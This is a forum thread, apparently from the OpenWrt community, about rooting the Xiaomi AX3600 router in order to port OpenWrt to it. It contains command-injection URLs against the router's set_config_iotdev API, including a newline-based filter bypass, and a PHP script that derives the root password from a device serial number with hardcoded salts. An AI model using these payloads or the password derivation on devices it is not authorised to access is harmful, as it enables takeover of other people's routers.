Adding OpenWrt support for Xiaomi AX3600

Hello,
Where can one see the algorithm from which I can derive the root password?

Hi
You can use the following code to change the root password to "admin"

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
4 Likes

Thanks,

But I am also interested in the algorithm they used to create the root password based on device SN. If you can point me in the right direction.

#!/usr/bin/env php
<?php
$salt = array(
    'r1d' => 'A2E371B0-B34B-48A5-8C40-A7133F3B5D88',
    'others' => 'd44fb0960aa0-a5e6-4a30-250f-6d2df50a'
);

isset($argv[1]) or die('Usage: ' . $argv[0] . " SN\n");
print_line(get_passwd($argv[1]));

function print_line($message) {
    echo $message . "\n";
}

function get_passwd($sn) {
    return substr(md5($sn . get_salt($sn)), 0, 8);
}

function get_salt($sn) {
    global $salt;
    if (false === strpos($sn, '/')) {
        return $salt['r1d'];
    } else {
        return swap_salt($salt['others']);
    }
}

function swap_salt($salt) {
    return implode('-', array_reverse(explode('-', $salt)));
}

link:https://blog.csdn.net/zhoujiazhao/article/details/102578244
use it like this:pi@DESKTOP-55HOBQT:/mnt/c/Users/someone/Desktop$ php a.php 10508/00771881

3 Likes

Thanks mate,
I appreciate it!

Is there anyway to help get openwrt to AX3600?
I may be able to handle programming, but I have no idea on how devices/kernels/drivers etc work and where I should start, how to test etc.

I am also in :slight_smile:

2 Likes

teardown
complete ttl contact
connect
copy boot log

1 Like

secure boot fuse is not enabled :laughing:

5 Likes

Perhaps a dumb question, but I'm in the market for a new router/ap. I don't trust Xiaomi enough to make it my main device if I can't put OpenWRT on it. I am however, willing to run it temporarily behind my current router and block all traffic in their direction, until I can actually do so.

Does this finding mean that an OpenWRT build has a good chance of happening in the next 6-12months?

Thanks!

It is way too early to answer this question, a lot can still go wrong and I haven't seen anyone even started working on a port for it. While chances aren't too bad, you won't know until someone at least submits a first approach as a pull request (even that won't give you any guarantees, until the patch set has actually been merged, but it would at least show you what would be possible - right now, it's still a va banque game).

1 Like

LonGDikE,

Thanks for the tips to lead to getting SSH. On the unit I just received and downgraded to 1.0.17 - none of your commands as written worked. This appears to be due to the fact that this firmware performs some auto-filtering of characters that could lead to escape. Specifically ; & $ appear to not be permitted. After searching around a bit I came across this article:

In there it details that you can use newlines (%0A) [percent zero capital-A] instead of semicolons with some Xiaomi routers. With that, I was able to confirm escape via the following URL:

http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=%0Areboot%0A

Which, happily, rebooted the router. From there I was able to enable nvram SSH and then deleted the IF in /etc/init.d/dropbear by piping the dropbear contents to sed '135d' three times (which deleted the IF, the return 0, and the FI to stop the init file from keeping SSH off). I then used your command to change admin password, however, there is a password length requirement (8 characters seemed to do the trick).

I have confirmed that the %0Areboot%0A does not work on the 1.0.50 firmware (which is the latest as of this post).

Let me know if anyone would like more specifics or details. Happy to help to bring OpenWRT to this puppy.

You can take a look here: Xiaomi AX3600 DTS
Someone is already trying to gather the necessary information (slh and efsg).

I gave the AX3600 to zhiping, soon...

1 Like

esfg,

As you have serial port access, do you need anything from a persistent SSH perspective?

I do not know...
(MiWiFi/HiWiFi)Xiaomi can block at any time

Correct - the exploit I leveraged only works via downgrading to 1.0.17. As of 1.0.50 - it cannot be used as the method has been patched.

Yes, but we could still use 1.0.17 as a vector to get in the router and flash openwrt. Even as an install instruction it shouldn't be something difficult to do(as long as Xiaomi doesn't release firmwares that blocks downgrade-ing to 1.0.17).

What we need now is a openwrt build for this device, right?

Hello new in openwrt because following this router as i see movement for a posible future openwrt firmware i buyed today one!

Hope can we get this ax3600 router!!

we can win!

3 Likes